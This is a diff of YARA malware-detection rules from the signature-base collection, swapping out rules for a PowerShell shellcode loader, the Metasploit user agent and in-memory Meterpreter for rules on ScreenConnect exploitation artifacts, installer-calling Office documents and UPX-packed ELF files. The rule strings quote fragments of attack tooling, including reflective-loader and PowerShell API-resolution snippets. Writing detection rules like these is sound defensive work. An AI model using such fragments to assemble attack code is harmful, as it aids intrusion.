+		author = "Florian Roth"
+		id = "9299fd44-5327-5a73-8299-108b710cb16e"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L249-L268"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed6e408575b88ff67479ac1b1a2f37c5fad3ec200a446700840ad4245386bfc4"
+		logic_hash = "fd6ebc6676d677d6bc19398026eee7b7d2f9727ba7a3c79d1e970a6dc19548aa"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87"
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e70f6307aae21f9090"
+		hash2 = "b0adf3d58fa354dbaac6a2047b6e30bc07a5460f71db5f5975ba7b96de986243"
+		hash3 = "c0f7970bed203a5f8b2eca8929b4e80ba5c3276206da38c4e0a4445f648f3cec"
 
 	strings:
-		$s1 = "kernel32.dll WaitForSingleObject)," ascii
-		$s2 = "= ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')" ascii
-		$s3 = "GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object" ascii
-		$s4 = ".DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual'," ascii
-		$s5 = "= [System.Convert]::FromBase64String(" ascii
-		$s6 = "[Parameter(Position = 0, Mandatory = $True)] [Type[]]" fullword ascii
-		$s7 = "DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard," ascii
+		$s1 = "Driver.dll" wide fullword
+		$s2 = "X l.dlT" ascii fullword
+		$s3 = "$928c7481-dd27-8e23-f829-4819aefc728c" ascii fullword
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_MAL_Metasploit_Framework_UA : FILE
+rule SIGNATURE_BASE_SUSP_Doc_Windowsinstaller_Call_Feb22_1 : FILE
 {
 	meta:
-		description = "Detects User Agent used in Metasploit Framework"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5a18456-3a07-5b58-ad95-086152298a1f"
-		date = "2018-08-16"
+		description = "Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts."
+		author = "Nils Kuhnert"
+		id = "8f2e8f91-74e0-5574-9c0a-1479d6114212"
+		date = "2022-02-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L325-L339"
+		reference = "https://twitter.com/threatinsight/status/1497355737844133895"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_maldoc.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "986fea99735b93aed9dbf72582c009e11a1e7ba19b256902f93312474ef34b4a"
+		logic_hash = "279182487ab7d35264adfbd0d122ee7634cd92ae1711de78ec7f20928df34f49"
 		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29"
+		tlp = "white"
 
 	strings:
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)" fullword ascii
+		$ = "WindowsInstaller.Installer$"
+		$ = "CreateObject"
+		$ = "InstallProduct"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+		uint32be( 0 ) == 0xd0cf11e0 and all of them
 }
-rule SIGNATURE_BASE_HKTL_Meterpreter_Inmemory
+rule SIGNATURE_BASE_SUSP_ELF_LNX_UPX_Compressed_File : FILE
 {
 	meta:
-		description = "Detects Meterpreter in-memory"
-		author = "netbiosX, Florian Roth"
-		id = "29c3bb7e-4da8-5924-ada7-2f28d9352009"
-		date = "2020-06-29"
-		modified = "2023-04-21"
-		reference = "https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L341-L363"
+		description = "Detects a suspicious ELF binary with UPX compression"
+		author = "Florian Roth (Nextron Systems)"
+		id = "078937de-59b3-538e-a5c3-57f4e6050212"
+		date = "2018-12-12"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_elf_file_anomalies.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4b39dbcb276842a1306205cf2e51ce86b6d2aa21353d277df15f4ea3b3d97678"
-		score = 85
+		logic_hash = "0d310de1ab68bd6da9ae057c7edea0d6b24d408f85ec40c2306f1ac8a2bc2f55"
+		score = 40
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4"
 
 	strings:
-		$sxc1 = { 6D 65 74 73 72 76 2E 64 6C 6C 00 00 52 65 66 6C
-               65 63 74 69 76 65 4C 6F 61 64 65 72 }
-		$sxs1 = "metsrv.x64.dll" ascii fullword
-		$ss1 = "WS2_32.dll" ascii fullword
-		$ss2 = "ReflectiveLoader" ascii fullword
-		$fp1 = "SentinelOne" ascii wide
-		$fp2 = "fortiESNAC" ascii wide
-		$fp3 = "PSNMVHookMS" ascii wide
+		$s1 = "PROT_EXEC|PROT_WRITE failed." fullword ascii
+		$s2 = "$Id: UPX" fullword ascii
+		$s3 = "$Info: This file is packed with the UPX executable packer" ascii
+		$fp1 = "check your UCL installation !"
 
 	condition:
-		(1 of ( $sx* ) or 2 of ( $s* ) ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x457f and filesize < 2000KB and filesize > 30KB and 2 of ( $s* ) and not 1 of ( $fp* )
 }